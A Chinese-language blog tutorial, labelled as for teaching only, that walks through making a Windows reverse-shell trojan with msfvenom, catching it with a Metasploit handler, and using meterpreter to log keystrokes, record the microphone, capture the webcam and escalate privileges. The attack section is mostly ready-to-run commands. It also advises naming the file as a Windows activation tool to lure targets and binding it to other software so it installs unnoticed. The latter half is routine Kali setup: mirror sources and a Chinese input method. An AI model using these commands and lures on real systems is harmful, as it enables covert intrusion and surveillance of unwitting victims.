kali入侵电脑

注意:本文仅用于教学目的

1 kali制作exe控制电脑(msfvenom)

kali是黑客常用的系统,里面集成了很多的攻击软件,这里我给大家演示一种使用kali制作.exe文件来控制自己电脑的方式。

msfvenom a Metasploit standalone payload generator,Also a replacement for msfpayload and msfencode.是用来生成后门的软件。 MSFvenom是Msfpayload和Msfencode的组合,将这两个工具都放在一个Framework实例中。自2015年6月8日起,msfvenom替换了msfpayload和msfencode。

1.1 生成后门文件.exe(木马)

鼠标右键打开终端(open terminal),进入管理员模式

sudo su

# linux系统密码是隐藏的,直接输入完之后回车即可

生成后门文件:

msfvenom -p windows/meterpreter/reverse_tcp LHOST=本地kali的ip LPORT=本地kali且未占用端口号 –f exe –o 文件名.exe

例如:

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.145.98 LPORT=9999 -f exe -o hacker.exe

参数: -p payloads -f 输出格式 -o 输入地址 -e 编码方式(msfvenom -l -encoder可以查看能使用的编码) -x | -k 绑定程序(例如-x C:\test.exe -k -f exe -o C:\shell.exe)

即生成一个后门文件hacker.exe(我这里是将文件名命名为hacker的)

本地ip写自己Kali的IP地址,用ifconfig就能查看自己Kali的IP地址 本地端口自己随便设置一个没有被占用的端口号,如果端口号被占用那么文件会生成失败,换一个端口号就性 文件名可以随便写自己喜欢的名字,比如写Win10激活工具,可能更容易让目标主机上钩 当然MSF也可以用来渗透手机、mac、Linux等

1.2 配置参数

运行msfconsole

msfconsole

选择模块

msf>use exploit/multi/handler

设置负载

msf exploit(handler) > set payload windows/meterpreter/reverse_tcp

配置端口和ip

set lhost 加ip地址 set lport 加端口号

查看参数配置

show options

(1)命令: use exploit/multi/handler(选择模块) (2)命令: set payload windows/meterpreter/reverse_tcp(选择攻击模块) (3)命令: set LhOST 192.168.32.1(填写自己主机的IP地址) (4)命令: set lport 1111(填写刚才生成文件时的端口号) (5)命令: show options(查看设置参数) (6)命令: exploit -z -j(后台执行)

6. 执行

# 后台执行

exploit -z -j

# 直接执行

exploit

1.3 将木马发送到目标靶机windows

通过VMTools或者通过其他传输方式,将hacker.exe发送到本地windows

我们可以在root文件夹下找到我们生成木马: 通过VMtools拖动到本地windows,然后双击执行:

这个木马很可能被杀毒软件检测出来,需要提前关闭杀毒软件我们这里也可以把这个程序伪装一下,把他的图标改一下,或者把它捆绑在某些软件上面,当用户打开就自动安装到对方电脑上面

1.4 查看结果

查看上钩用户:

sessions

选择攻击第1个目标:

sessions -i 1

出现meterpreter你就已经成功的入侵的对方的电脑

1.5 操作靶机

监控靶机屏幕:

VNC:virtual network console 虚拟网络控制台

run vnc -i

上传文件到靶机

注意:linux是严格区分大小写的,填写文件名的时候需要注意

结果:

其他命令:

cmd指令: cat 读取文件内容到屏幕 cd 更改目录 checksum 检索文件的校验和 cp 将源复制到目标 del 删除指定文件 dir 列出文件(ls 的别名) 下载 下载文件或目录 编辑 编辑文件 getlwd 打印本地工作目录 getwd 打印工作目录 lcd 更改本地工作目录 lls 列出本地文件 lpwd 打印本地工作目录 ls 列出文件 mkdir 创建目录 mv 将源移动到目标 pwd 打印工作目录 rm 删除指定文件 rmdir 删除目录 search 搜索文件 show_mount 列出所有挂载点/逻辑驱动器 upload 上传文件或目录 pkill 按名称终止进程

meterpreter命令: keyscan_start 开始捕获击键(开始键盘记录) keyscan_dump 转储按键缓冲(下载键盘记录) keyscan_stop 停止捕获击键(停止键盘记录) record_mic X秒从默认的麦克风record_mic音频记录(音频录制) webcam_chat 开始视频聊天(视频,对方会有弹窗) webcam_list 单摄像头(查看摄像头列表) webcam_snap 采取快照从指定的摄像头(摄像头拍摄一张照片) webcam_stream 播放视频流从指定的摄像头(开启摄像头监控) enumdesktops 列出所有可访问的桌面和窗口站(窗体列表) getdesktop 得到当前的Meterpreter桌面 reboot 重新启动远程计算机 shutdown 关闭远程计算机 shell 放入系统命令 shell enumdesktops 列出所有可访问的桌面和窗口站 getdesktop 获取当前的meterpreter桌面 idletime 返回远程用户空闲的秒数 keyboard_send 发送击键 keyevent 发送按键事件 keyscan_dump 转储击键缓冲区 keyscan_start 开始捕获击键 keyscan_stop 停止捕获击键 mouse 发送鼠标事件 screenshare 实时观看远程用户桌面 screenshot 抓取交互式桌面的屏幕截图 setdesktop 更改 Meterpreters 当前桌面 uictl 控制一些用户界面组件 record_mic 从默认麦克风录制音频 X 秒 webcam_chat 开始视频聊天 webcam_list 列出网络摄像头 webcam_snap 从指定的网络摄像头拍摄快照 webcam_stream 播放来自指定网络摄像头的视频流 play 在目标系统上播放波形音频文件 (.wav) getsystem 尝试将您的权限提升到本地系统的权限 execute -f notepad 打开记事本

1.6 kali安装输入法

查看内核版本

uname -a

2. 配置阿里镜像源

如果不配置,kali会从国外下载软件,速度会非常慢

vim /etc/apt/sources.list

#中科大

deb http://mirrors.ustc.edu.cn/kali kali-rolling main non-free contrib

deb-src http://mirrors.ustc.edu.cn/kali kali-rolling main non-free contrib

#阿里云

deb http://mirrors.aliyun.com/kali kali-rolling main non-free contrib

deb-src http://mirrors.aliyun.com/kali kali-rolling main non-free contrib

#清华大学

deb http://mirrors.tuna.tsinghua.edu.cn/kali kali-rolling main contrib non-free

deb-src https://mirrors.tuna.tsinghua.edu.cn/kali kali-rolling main contrib non-free

#浙大

deb http://mirrors.zju.edu.cn/kali kali-rolling main contrib non-free

deb-src http://mirrors.zju.edu.cn/kali kali-rolling main contrib non-free

#官方源

deb http://http.kali.org/kali kali-rolling main non-free contrib

deb-src http://http.kali.org/kali kali-rolling main non-free contrib

deb http://mirrors.163.com/debian/ jessie main non-free contrib

deb http://mirrors.163.com/debian/ jessie-updates main non-free contrib

deb-src http://mirrors.163.com/debian/ jessie main non-free contrib

deb-src http://mirrors.163.com/debian/ jessie-updates main non-free contrib

deb http://mirrors.163.com/debian-security/ jessie/updates main non-free contrib

deb-src http://mirrors.163.com/debian-security/ jessie/updates main non-free contrib

同步索引,升级软件包

apt-get update && apt-get upgrade

如果内核版本过低,就会报如下错误: kali-rolling &&apt-get update 报错-GPG erro

使用旧版kali经常会发生apt-get update 报错 -GPG error, invalid key 【由于没有公钥,无法验证下列签名】

解决办法:

添加公钥:

sudo apt-key adv --keyserver keyserver.ubuntu.com --recv-keys ED444FF07D8D0BF6# 最后这部分就是上面那个NO_PUBKEY 后面的一坨

4. 安装fcitx

apt-get install fcitx

顺利的话会自动安装成功,如果遇到依赖错误,按提示修复或者输入apt-get -f install修复

重新更新软件包:

apt-get update

安装fcitx-libs-qt

apt-get install fcitx-libs-qt

如果提示有依赖没有安装,可以用apt-get --fix-broken install安装

下载google输入法,并重启:

apt-get -y install fcitx-googlepinyin

# 过程中如果有询问,直接输入y

# 重启电脑

reboot

配置输入法

如果你的配置中没有Google的话,需要添加输入法

注意:添加之后一定要将Google拼音移到最前面,这样才会表示默认输入法使用Google

双击Google拼音所在栏,将键盘布局调整为汉语: 测试:

参考: https://blog.csdn.net/RFZ_322/article/details/123367668

查看原文